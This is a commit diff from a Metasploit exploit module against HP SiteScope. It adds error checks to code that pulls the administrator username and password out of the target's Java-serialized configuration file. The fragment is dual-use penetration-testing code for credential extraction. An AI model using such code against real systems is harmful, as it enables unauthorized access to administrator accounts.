add some checks while parsing the java serialization config file
parent
b2116e2394
commit
2f87af1c3a
|
@ -91,9 +91,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1]
|
admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1]
|
||||||
|
|
||||||
admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
|
if not admin_data or admin_data.empty?
|
||||||
password_length = admin_password.unpack("C").first
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
|
||||||
|
|
||||||
|
if not admin_password or admin_password.empty?
|
||||||
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
password_length = admin_password.unpack("C").first
|
||||||
if password_length > 0
|
if password_length > 0
|
||||||
password = admin_password[1, password_length]
|
password = admin_password[1, password_length]
|
||||||
else
|
else
|
||||||
|
@ -102,7 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2]
|
admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2]
|
||||||
|
|
||||||
|
if not admin_user_type or admin_user_type.empty?
|
||||||
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
if admin_user_type == "_logint"
|
if admin_user_type == "_logint"
|
||||||
|
if not admin_user or admin_user.empty?
|
||||||
|
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
|
||||||
|
return
|
||||||
|
end
|
||||||
user_length = admin_user.unpack("C").first
|
user_length = admin_user.unpack("C").first
|
||||||
else
|
else
|
||||||
user_length = 0
|
user_length = 0
|
||||||
|
|
Loading…
Reference in New Issue